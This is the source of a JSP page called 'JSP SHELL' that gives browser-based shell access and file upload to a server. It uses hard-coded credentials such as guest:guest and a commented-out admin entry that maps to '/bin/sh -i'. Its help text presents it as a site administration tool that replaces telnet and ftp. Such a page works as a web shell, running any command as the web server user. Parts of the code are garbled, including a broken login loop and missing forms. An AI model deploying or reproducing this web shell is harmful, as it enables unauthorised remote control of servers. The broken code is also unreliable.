<% // Edit the list below to add/remove to the list of autorized users // (username:password:allow file transfer(yes/no):shell). // The username and password have no relationship with the host accounts. String accounts[]={ // ********************************************************************************** "guest:guest:no:cat -n", // "admin:apassword:yes:/bin/sh -i", // "operator:opassword:no:/usr/bin/mysql -f -n -u Dbuser DBBANE", // ********************************************************************************** "" }; String opt=request.getParameter("OPTION"); String cmdstr=request.getParameter("COMMAND"); String message="User Authentication"; boolean upload=false; boolean distinct=false; String p=null; if ((p=request.getParameter("DISTINCT"))!=null && p.equals("1")) distinct=true; if (opt==null) opt=""; if (cmdstr==null) cmdstr=""; String helpstr="
JSP SHELL HELP

\n" + "JSP SHELL gives you full site administration capabilities right from the browser.\n" + "Once authenticated, you get a shell prompt right inside the browser (or as close as\n" + "it can possibly get). Additionally, you get a file upload option.

\n" + "It works as a substitute for telnet and ftp. You may find it useful under the following\n" + "situations-

\n" + "

    " + "
  1. Your ISP does not provide you a telnet at all.
    2. \n" + "
  2. You need to manage your site frequently from behind a firewall or proxy, where\n" + "running a telnet or a ftp is not possible.
    3. \n" + "
" + "Please note the following important points-\n" + "
    \n" + "
  1. You need a login and password to access JSP shell.
    2. \n" + "
  2. The login information is not same as your machine login.
    3. \n" + "
  3. The account information for access to JSP SHELL is hard-coded in the script itself.\n" + "If you need access, check with your administrator.
    4. \n" + "
  4. Once logged in, the shell runs as the same user as your Java web server.
    5. \n" + "
  5. The shell used for interacting can be configured for each user (normally sh).
    6. \n" + "
  6. The top frame is for entering commands, the middle frame is the command output and the lower\n" + "frame is the command error.
    7. \n" + "
  7. You can type any command that you type on a login shell, including the once that\n" + "require input from stdin. You cannot however run commands that require the terminal such as\n" + "vi
    8. \n" + "
  8. When using commands that require stdin, you need to use << redirector to set an EOF\n" + "marker. There is no way to signal EOF from the interface. If you use this, then subsequent\n" + "lines entered in the command are passed in as the stdin. You must the EOF marker also in\n" + "the command line to return back to shell.
    9. \n" + "
  9. Sometimes if the output that is produced takes more time, if may not be fully displayed.\n" + "To flush any output from the server, send an empty command.
    10. \n" + "
\n" ; response.setIntHeader("Expires",0); if (opt.equalsIgnoreCase("HELP")) { %><%= helpstr %><% } else if (opt.equalsIgnoreCase("LOGOUT")) { cmd.Stop(); cmd.setShell(""); } else if (opt.equalsIgnoreCase("LOGIN")) { cmd.Stop(); cmd.setShell(""); for (int i=0; i0 && opt.length()==0) opt="MAIN"; if (cmd.getShell().length()==0 && !opt.equals("HELP")) { %> Administer your JSP and UNIX sites from the browser!
Browser-based JSP/UNIX site administration.

<%= message %>
Username
Password
<%= helpstr %> <% } else if (opt.equalsIgnoreCase("MAIN")) { cmd.Init(); %> <% } else if (opt.equalsIgnoreCase("RUN") && !cmd.getState().equals("READY")) { cmd.setShell(""); %><% } else if (opt.equalsIgnoreCase("RUN")) { cmd.Run(cmdstr, distinct); %>
History > Distinct Shell is <%= cmd.getShell() %>
Command <% if (upload) { %> Upload File   <% } else { %> Cannot Upload File   <% } %> Logout   Help
<% } else if (opt.equalsIgnoreCase("STDOUT")) { %>
<%
   cmd.Stdout(out);
%>
<% } else if (opt.equalsIgnoreCase("STDERR")) { %>
<%
   cmd.Stderr(out);
%>
<% } %>